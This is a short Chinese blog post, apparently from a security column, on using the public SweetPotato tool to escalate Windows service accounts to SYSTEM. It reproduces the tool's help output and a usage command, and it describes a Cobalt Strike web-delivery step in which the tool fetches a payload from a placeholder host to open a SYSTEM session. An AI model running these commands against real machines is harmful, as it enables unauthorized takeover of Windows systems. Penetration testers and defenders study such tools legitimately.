前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Windows提权之SweetPotato

Windows提权之SweetPotato

作者头像
Al1ex
发布2023-03-29 14:17:45
1.6K0
发布2023-03-29 14:17:45
举报
文章被收录于专栏:网络安全攻防
基本介绍

从Windows 7到Windows 10 / Server 2019的本地服务到系统权限提升漏洞,也是土豆家族的有一个提权漏洞

项目地址

https://github.com/CCob/SweetPotato

代码语言:javascript
复制
SweetPotato by @_EthicalChaos_
  Orignal RottenPotato code and exploit by @foxglovesec
  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
  PrintSpoofer discovery and original exploit by @itm4n
  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
  -c, --clsid=VALUE          CLSID (default BITS:
                               4991D34B-80A1-4291-83B6-3328366B9097)
  -m, --method=VALUE         Auto,User,Thread (default Auto)
  -p, --prog=VALUE           Program to launch (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -e, --exploit=VALUE        Exploit mode
                               [DCOM|WinRM|EfsRpc|PrintSpoofer(default)]
  -l, --listenPort=VALUE     COM server listen port (default 6666)
  -h, --help                 Display this help

使用方法

代码语言:javascript
复制
SweetPotato.exe -a "whoami"

再使用过程中可以自定义 clsid 与端口,--help或者 - h查看帮助

同时可以对SweetPotato进行修改,使其可以直接上线一个system的session,效果图如下所示:

代码语言:javascript
复制
Step 1: 使用cs启动一个web攻击的简体
Step 2: 执行以下命令
SweetPotato.exe www.xxx.com/xxx.xxx

文末小结

后续将会继续给出一些土豆家族的提权漏洞的使用方法,敬请期待~

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-03-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 七芒星实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 基本介绍
  • 项目地址
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档